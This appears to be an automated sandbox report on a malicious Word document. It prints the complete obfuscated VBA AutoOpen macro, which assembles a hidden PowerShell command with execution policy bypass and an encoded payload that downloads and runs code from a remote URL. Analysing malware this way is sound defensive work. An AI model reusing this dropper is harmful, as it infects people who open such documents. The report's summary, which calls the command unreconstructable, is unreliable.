MALICIOUS
110
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a Word document containing a VBA macro with an AutoOpen subroutine. This macro constructs a string that appears to be a Base64 encoded command, likely intended for execution via PowerShell. The macro uses string concatenation and an array of characters to build the command, which is then likely decoded and executed. The specific command is too obfuscated to fully reconstruct, but the presence of 'System.Text.Encoding' and 'ToBase64String' suggests a decoding operation.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
ET_QJ = ET_QJ + BR_TF Shell$ ET_QJ End Sub -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "remi" Sub AutoOpen() Dim ET_QJ As String -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5896 bytes |
SHA-256: d3108f6d07df4ddc4dea470985aeb78fa7746fc7103c8045edc265ccf6793645 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "remi"
Sub AutoOpen()
Dim ET_QJ As String
IQ_KC = Array("p", "o", "l", "-", "r", " ", "s", "u", "x", "i", "d", "h", "y", "e", "w", "t", "n", "b", "a", "c")
Dim AM_SJ As String
AM_SJ = "ZgB1AG4AYwB0AGkAbwBuACAAYQAoACQAeAAp"
ET_QJ = ET_QJ + IQ_KC(0)
ET_QJ = ET_QJ + IQ_KC(1)
Dim HO_TE As String
HO_TE = "AHsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVAB"
ET_QJ = ET_QJ + IQ_KC(14)
ET_QJ = ET_QJ + IQ_KC(13)
Dim BT_PI As String
BT_PI = "lAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBV"
ET_QJ = ET_QJ + IQ_KC(4)
ET_QJ = ET_QJ + IQ_KC(6)
Dim JL_PG As String
JL_PG = "AFQARgA4AC4ARwBlAHQAUwB0"
ET_QJ = ET_QJ + IQ_KC(11)
ET_QJ = ET_QJ + IQ_KC(13)
Dim HS_TE As String
HS_TE = "AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBl"
BR_TF = BR_TF & AM_SJ & HO_TE & BT_PI & JL_PG & HS_TE
ET_QJ = ET_QJ + IQ_KC(2)
ET_QJ = ET_QJ + IQ_KC(2)
Dim CL_NC As String
CL_NC = "AHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdA"
ET_QJ = ET_QJ + IQ_KC(5)
ET_QJ = ET_QJ + IQ_KC(3)
Dim EK_MJ As String
EK_MJ = "ByAGkAbgBnACgAJAB4ACkAKQB9ADsAaQBlAHgAIA"
ET_QJ = ET_QJ + IQ_KC(14)
ET_QJ = ET_QJ + IQ_KC(9)
Dim IO_SB As String
IO_SB = "AkACgAYQAgACQAKAAkACgAJAAoAGkAbgB2AG8A"
ET_QJ = ET_QJ + IQ_KC(16)
ET_QJ = ET_QJ + IQ_KC(10)
Dim AS_QF As String
AS_QF = "awBlAC0AdwBlAGIAcg"
ET_QJ = ET_QJ + IQ_KC(1)
ET_QJ = ET_QJ + IQ_KC(14)
Dim JK_RC As String
JK_RC = "BlAHEAdQBlAHMAdAAgACcAaAB0AHQAcABz"
BR_TF = BR_TF & CL_NC & EK_MJ & IO_SB & AS_QF & JK_RC
ET_QJ = ET_QJ + IQ_KC(6)
ET_QJ = ET_QJ + IQ_KC(15)
Dim CN_SB As String
CN_SB = "ADoALwAvAHUAcwBwAHIAZAA1A"
ET_QJ = ET_QJ + IQ_KC(12)
ET_QJ = ET_QJ + IQ_KC(2)
Dim ER_QG As String
ER_QG = "DEANQAwAGMAZQBuAHQAcgBhAGwALg"
ET_QJ = ET_QJ + IQ_KC(13)
ET_QJ = ET_QJ + IQ_KC(5)
Dim EN_OF As String
EN_OF = "B0AGEAYgBsAGUALgBjA"
ET_QJ = ET_QJ + IQ_KC(11)
ET_QJ = ET_QJ + IQ_KC(9)
Dim IT_MB As String
IT_MB = "G8AcgBlAC4AdwBpAG4AZ"
ET_QJ = ET_QJ + IQ_KC(10)
ET_QJ = ET_QJ + IQ_KC(10)
Dim CQ_RI As String
CQ_RI = "ABvAHcAcwAuAG4AZQB0AC8AdwBhAHIAZQBoAG8A"
BR_TF = BR_TF & CN_SB & ER_QG & EN_OF & IT_MB & CQ_RI
ET_QJ = ET_QJ + IQ_KC(13)
ET_QJ = ET_QJ + IQ_KC(16)
Dim DR_NE As String
DR_NE = "dQBzAGUAPwAkAGYAaQBsAHQA"
ET_QJ = ET_QJ + IQ_KC(5)
ET_QJ = ET_QJ + IQ_KC(3)
Dim AK_KF As String
AK_KF = "ZQByAD0AUABhAHIAdABpAHQAaQBvAG4ASwBlAHkAJQ"
ET_QJ = ET_QJ + IQ_KC(13)
ET_QJ = ET_QJ + IQ_KC(8)
Dim DT_RC As String
DT_RC = "AyADAAZQBxACUAMgAwACUAMgA3AHMAdABhAGcAZQAlADIANwA"
ET_QJ = ET_QJ + IQ_KC(13)
ET_QJ = ET_QJ + IQ_KC(19)
Dim HP_TB As String
HP_TB = "mACQAUwBlAGwAZQBjAHQAPQBkAGEAdABhACYAcwB2"
ET_QJ = ET_QJ + IQ_KC(7)
ET_QJ = ET_QJ + IQ_KC(15)
Dim GT_PE As String
GT_PE = "AD0AMgAwADEANwAtADAANA"
BR_TF = BR_TF & DR_NE & AK_KF & DT_RC & HP_TB & GT_PE
ET_QJ = ET_QJ + IQ_KC(9)
ET_QJ = ET_QJ + IQ_KC(1)
Dim IN_QI As String
IN_QI = "AtADEANwAmAHMAcwA9AGIAZgBxAHQAJgBzAHIA"
ET_QJ = ET_QJ + IQ_KC(16)
ET_QJ = ET_QJ + IQ_KC(0)
Dim AN_SD As String
AN_SD = "dAA9AHM"
ET_QJ = ET_QJ + IQ_KC(1)
ET_QJ = ET_QJ + IQ_KC(2)
Dim FR_QD As String
FR_QD = "AYwBvACYAcwBwAD0AcgB"
ET_QJ = ET_QJ + IQ_KC(9)
ET_QJ = ET_QJ + IQ_KC(19)
Dim FK_RD As String
FK_RD = "3AGQAbABhAGMAdQBwACY"
ET_QJ = ET_QJ + IQ_KC(12)
ET_QJ = ET_QJ + IQ_KC(5)
Dim JK_QC As String
JK_QC = "AcwBlAD0AMgAwADEANwAtADEAMAAtADAAN"
BR_TF = BR_TF & IN_QI & AN_SD & FR_QD & FK_RD & JK_QC
ET_QJ = ET_QJ + IQ_KC(17)
ET_QJ = ET_QJ + IQ_KC(12)
Dim FM_OG As String
FM_OG = "gBUADIAMgA6ADQAMQA6ADEAMgBaAC"
ET_QJ = ET_QJ + IQ_KC(0)
ET_QJ = ET_QJ + IQ_KC(18)
Dim AQ_OF As String
AQ_OF = "YAcwB0AD0AMgAwADEANwAtADAAOQAtADIA"
ET_QJ = ET_QJ + IQ_KC(6)
ET_QJ = ET_QJ + IQ_KC(6)
Dim IP_NG As String
IP_NG = "OABUADEANAA6ADQAMQA6ADEAMgBaACYAcwBwAHIAPQBoAHQ"
ET_QJ = ET_QJ + IQ_KC(5)
ET_QJ = ET_QJ + IQ_KC(3)
Dim HN_TC As String
HN_TC = "AdABwAHMAJgBzAGkA"
ET_QJ = ET_QJ + IQ_KC(13)
ET_QJ = ET_QJ + IQ_KC(5)
Dim AR_TD As String
AR_TD = "ZwA9AHQAegBQADcAYwA4AHgAWgBoAHIAMQBzAGI"
BR_TF = BR_TF & FM_OG & AQ_OF & IP_NG & HN_TC & AR_TD
Dim HQ_MF As String
HQ_MF = "AdgB4ADkAZgBKA"
Dim GT_LB As String
GT_LB = "FMAdwBKAEkAUwBIAEIANgBlADgAJQAyAEIAbg"
Dim FQ_QH As String
FQ_QH = "BsAGwAdQBuAEgAaQBmAEwAMwBoAHgAagA0AC"
Dim HN_TJ As String
HN_TJ = "UAMwBEACcAIAAtAEgAZQBhAGQA"
Dim FK_NA As String
FK_NA = "ZQByAHMAIABAAHsAJwBBA"
BR_TF = BR_TF & HQ_MF & GT_LB & FQ_QH & HN_TJ & FK_NA
Dim JQ_RD As String
JQ_RD = "GMAYwBlAHAAdA"
Dim DS_QJ As String
DS_QJ = "AnAD0AJwBBAHAAcABsA"
Dim HR_QB As String
HR_QB = "GkAYwBhA"
Dim BK_NI As String
BK_NI = "HQAaQBvAG4ALwBKAFMATwBOACcAfQApAC4AQwBvAG4AdABl"
Dim AS_PD As String
AS_PD = "AG4AdAAgAHwAIABDAG"
BR_TF = BR_TF & JQ_RD & DS_QJ & HR_QB & BK_NI & AS_PD
Dim HS_KH As String
HS_KH = "8AbgB2AGUAcgB0AEYAcg"
BR_TF = BR_TF & HS_KH
Dim HQ_SF As String
HQ_SF = "BvAG0ALQBKAHMAbwBuACkALgB2AGEA"
BR_TF = BR_TF & HQ_SF
Dim JN_NJ As String
JN_NJ = "bAB1AGUALgBkAGEAdABhACkAKQA="
BR_TF = BR_TF & JN_NJ
ET_QJ = ET_QJ + BR_TF
Shell$ ET_QJ
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.